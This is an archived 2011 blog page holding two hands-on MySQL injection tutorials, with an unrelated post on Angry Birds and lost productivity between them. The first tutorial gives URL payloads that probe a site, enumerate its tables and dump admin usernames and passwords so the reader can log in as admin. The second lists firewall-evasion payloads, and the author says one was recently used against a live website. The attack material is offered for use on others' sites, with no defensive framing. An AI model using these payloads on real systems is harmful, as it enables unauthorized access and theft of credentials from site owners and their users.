Sunday, September 25, 2011

MySQL Injection

MYSQL injection

Check for vulnerability:
------------------------
Let's say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ' (quote),
and that would be http://www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar
that means is vulrnable to sql injection :)
Find the number of columns:
----------------------------
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)
that means that the it has 3 columns, cause we got an error on 4.
Check for UNION function:
-------------------------
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
(we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)
Check for MySQL version:
------------------------
http://www.site.com/news.php?id=5 union all select 1,2,3,4/*
let say that we have number 4 on the screen, now to check for version
we replace the number 4 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
The version should be greater than 5 , if its less than 5 you should guess the table name.
Getting table and column name:
-------------------------------
http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
we get table names.check for table name admin of some login user.
now to check column names.
To check the columns replace the word “table” with column
http://www.site.com/news.php?id=5 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=hex_value
note: the table should be in hex value.(this works mostly)
we get columns displayed on screen, userid, passwd etc...
now to retrieve values use:
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser :D

Thursday, September 15, 2011

Angry Birds Costing Businesses $1.5 Billion In Lost Wages

The world's love of Angry Birds could be costing businesses over $1.5 billion in lost wages, according to an estimate from Alexis Madrigal of the Atlantic.

Madrigal looked at the methodology used to calculate things like how much money companies lose when productivity slows thanks to the NCAA tournament, or how much money is lost thanks to our obsession with fantasy football.

From there he came up with his estimate, which is laid out in the graphic below. He admits the math could be a little fuzzy, but says, "I bet this estimate is right to the order of magnitude, if not in the details."

Frankly, we think these sorts of things are bogus. Productivity isn't lost. People just do what they do. But, it's sort of fun to play with numbers.




Monday, September 12, 2011

MySQL injection with Bypassing WAF:


Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query. Some comments in SQL:
//, — , /**/, #, –+, — -, ;

Case Changing:

 Some WAF’s filter key words like /union\select/ig We can bypass this filter by using inline comments most of the time, More complex examples will require more advanced approach like adding SQL keywords that will further separate the two words:

id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point /*!code*/ The exclamation point executes our SQL statement.
Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments. For example:

id=1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/=database()– -

This bypass above works. I myself just used this against a Web site recently.

Buffer Overflow:/Unexpected input:
A lot of WAFS are written in the C language making them prone to overflow or or act differently when loaded with a bunch of data. Here is a WAF that does it’s job correctly, but when given a large amount of Data allows the malicious request and response.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33,34,35,36–+

Twitter Delicious Facebook Digg Stumbleupon Favorites More